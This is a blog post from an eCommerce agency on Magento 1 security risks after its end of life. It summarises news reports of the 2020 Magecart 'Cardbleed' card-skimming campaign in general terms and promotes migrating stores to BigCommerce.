• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar
  • Skip to footer
Eradium logo light background

Eradium

Omnichannel Commerce Solutions for Fast Growing Brands!

  • (416) 225-1057
  • Contact Us
Eradium Logo
  • Services
        • Design and Development
          • Omnichannel and Integration
          • eCommerce Platform Migration
        • Digital Marketing
        • Emerging eCommerce Technologies
        • Care and Optimization
  • Industries
        • Industries – B2C vs. B2B
        • B2C (Business to Consumer) eCommerce Solutions
        • B2B (Business to Business) eCommerce Solutions
  • Technology
        • Technology Platforms
        • eCommerce Technology Platform Selection
  • About Us
  • Blog
  • Library
You are here: Home / eCommerce / Magento 1 eCommerce Sites Security Vulnerabilities

Magento 1 eCommerce Sites Security Vulnerabilities

mage-cart-hacker

Back in June of this year, Magento 1 had its End of Life (EOL) which had a lot of businesses scrambling to figure out their best options while risking the chance of security vulnerabilities that the Magento 1 EOL opened up.
Whenever security risks are mentioned, it’s something to take seriously.

Let’s discuss your Magento to BigCommerce Migration Project
Contact Us

Thousands of online stores that operate using Magento software experienced a successful cyberattack since summer 2020. Here are some of the news headlines and updates from technology and cybersecurity research companies and publishers:

Update Sept 18: Cardbleed has infected 2806 Magento1 stores so far (3% of total install base).

Over the weekend, almost two thousand Magento 1 stores across the world have been hacked in the largest documented campaign to date. It was a typical Magecart attack: injected malicious code would intercept the payment information of unsuspected store customers. Inspected stores were found running Magento version 1, which was announced End-Of-Life last June. (1)

Over 2800 e-Shops Running Outdated Magento Software Hit by Credit Card Hackers(2)

Magecart Group 12: End of Life Magento Sites Infested with Ants and Cockroaches(3)

What is Magecart?

Magecart is a malware framework intended to steal credit card information from compromised eCommerce websites. Used in criminal activities, it’s a sophisticated implant built on top of relays, Command and Control services, anonymizers used to steal eCommerce customers’ credit card information. The first stage is typically implemented in Javascript included in a compromised checkout page. It copies data from “input fields” and send them to a relay that collects credit cards coming from a subset of compromised eCommerce sites and forwards them to Command and Control servers.

The term Magecart is not an official group, but rather a label for a set of tactics. The cybercriminals look for ways to exploit ecommerce software to steal credit card numbers and other personal customer information. This is usually done by capturing customer data as it’s entered into web forms for payment.

Unfortunately for those on the Magento platform, according to an October 2020 report by independent cybersecurity company Foregenix (5), 55% of Magento 2 sites are at a high or critical security risk level.

Some common security risks seen on Magento include server attacks, credit card hijacking, website defacement, and botnetting. All of these risks are only compounded now that Magento 1 is no longer supported. The reason? Magento is no longer creating updates or issuing security patches for the product.

Although you might be thinking that switching to Magento 2 (if you haven’t already) seems like the easy fix, it might not be. This option is still a complete replatform which means your themes won’t transfer, your M1 extensions won’t work, and some of your data will have to be migrated manually. M1 and M2 have a different architecture which is why this isn’t a simple upgrade.

Another option is to switch platforms altogether and BigCommerce might be the answer. I know you’re probably thinking you might as well stay with the platform you’re used to, but it might not be the case and you could lose out on a better option during a critical time.

With Magento, they’re an open-source platform that has been increasingly making shifts to appear more like a Software as a Service (SaaS) platform by introducing a cloud offering to give merchants the feel of having a single vendor. BigCommerce is already uniquely positioned as an open SaaS platform for easy use. This allows merchants to achieve customization and integrations that had historically only been possible using an on-premise open-source platform.

BigCommerce

  • With BigCommerce, there’s no installation or integration fees and no downtime with each upgrade.
  • When BigCommerce rolls out and update that enables a new feature, merchants will have access to it immediately and can control when or if they want to enable that new feature.
  • Over 90% of the BigCommerce is exposed via APIs. This, along with pre-built integrations and an open checkout, allow you to adapt the platform to your exact needs.

Magento

  • Keeping up with the security patches AND version updates necessary to have the latest secure version of Magento is time-consuming and labor-intensive.
  • The more customization a merchant makes, the harder their Magento store becomes to maintain.
  • Access to the source code means you have the ability to customize extensively; however, you may be limited by the cost and the complexity introduced.

Make the switch today and get rid of the security headaches with the best ecommerce platform out there. Start your free 15-day trial.

References

  1. “Cardbleed: a massive Magento1 hack – Sansec.” 14 Sep. 2020, https://sansec.io/research/cardbleed.
  2. “Over 2800 e-Shops Running Outdated Magento Software Hit ….”, https://thehackernews.com/2020/11/over-2800-e-shops-running-outdated.html.
  3. “Magecart Group 12: End of Life Magento Sites Infested with ….”, https://www.riskiq.com/resources/research/magecart-ant-and-cockroach-skimmer/.
  4. “magecart (Malware Family) – Malpedia”, https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart.
  5. “Magento Website Security Report”, https://f.hubspotusercontent00.net/hubfs/464751/Assets/Report/Foregenix-Magento_Security_Report-20201005.pdf

January 2, 2021 by Igor Nesmyanovich, Ph.D., CISSP

Primary Sidebar

Search

Share

Recent Posts

  • 3 Omnichannel Strategies Any Size Merchants Must Adopt in 2023
  • 10 Essentials eCommerce CX (Customer Experience) Checklist
  • 7 Essential Features of a B2B eCommerce Website
  • 3 New eCommerce Trends For 2022
  • 3 Pillars of eCommerce Fraud Prevention

Archive

Categories

  • Artificial Intelligence
    • Machine Learning
  • Big Data
  • eCommerce
  • Mobile
  • Omnichannel Marketing
  • Strategy

TAGS

Cloud Computing Data Science e-commerce sites best practices Ecommerce conversion rate eCommerce Email Marketing Best Practices Email Marketing Fashion eCommerce Best Practices Instagram Lean Data Analytics MailChimp Mobile Commerce Mobile Marketing online marketplaces Privacy Retail Marketing Retail Technology SEO Shopping Experience Social Media Marketing Supply Chain Management The Internet Of Things

Footer

Contact Us

contact@eradium.com

416-225-1057

400 Applewood Crescent, Unit 100

Vaughan, Ontario, L4K 0C3

Follow Us

  • Facebook
  • Instagram
  • LinkedIn
  • Twitter
Eradium BBB Business Review

Services

  • Design and Development
  • Digital Marketing
  • Care and Optimization
  • Emerging Technologies

Quick Links

  • About Us
  • Contact Us
  • eCommerce Library
  • Blog

Recent Articles and Posts

Recent Posts

  • 3 Omnichannel Strategies Any Size Merchants Must Adopt in 2023
  • 10 Essentials eCommerce CX (Customer Experience) Checklist
  • 7 Essential Features of a B2B eCommerce Website
  • 3 New eCommerce Trends For 2022
  • 3 Pillars of eCommerce Fraud Prevention

© 2014–2023 Eradium   Privacy Policy

Request Free Consultation
What email address would you like us to use?(required)
Your Name (required)
What's your organization's name?(required)
What phone number would you like us to contact you on?(required)
How can we help you?